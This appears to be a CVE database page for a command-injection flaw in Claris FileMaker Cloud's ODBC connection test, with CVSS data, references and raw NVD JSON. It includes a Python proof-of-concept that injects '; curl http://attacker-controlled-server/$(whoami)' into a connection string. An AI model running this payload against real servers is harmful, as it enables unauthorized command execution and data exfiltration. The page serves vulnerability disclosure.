CVE-2026-43685

Description

A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to inject arbitrary operating system commands through unsanitized input in the External ODBC Data Source connection test feature. This issue is fixed in FileMaker Cloud 2.22.0.5.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:* - VULNERABLE

Claris FileMaker Cloud < 2.22.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example API endpoint for ODBC test)
target_url = "https://<filemaker-cloud-host>/admin/api/data-sources/test-connection"

# Malicious payload attempting command injection
# Example: using a semicolon to chain a command in Linux/Unix
cmd_payload = "; curl http://attacker-controlled-server/$(whoami)"

# Headers with admin session cookie (requires High Privilege)
headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": "X-Claris-Session=valid_admin_session_token_here",
    "Content-Type": "application/json"
}

# Data payload targeting the ODBC connection string field
data = {
    "name": "ExploitDB",
    "type": "odbc",
    "connectionString": f"DRIVER={{MySQL}};SERVER=127.0.0.1{cmd_payload};DATABASE=test;"
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, json=data, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43685
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43685
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43685/
[4] VulDB https://vuldb.com/cve/CVE-2026-43685
[5] https://support.claris.com/s/answerview?anum=000049154&language=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43685", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:17.973", "lastModified": "2026-05-14T13:52:51.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to inject arbitrary operating system commands through unsanitized input in the External ODBC Data Source connection test feature. This issue is fixed in FileMaker Cloud 2.22.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.22.0.5", "matchCriteriaId": "A0DBAD4E-B906-4130-8D79-FBDD67974E60"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000049154&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}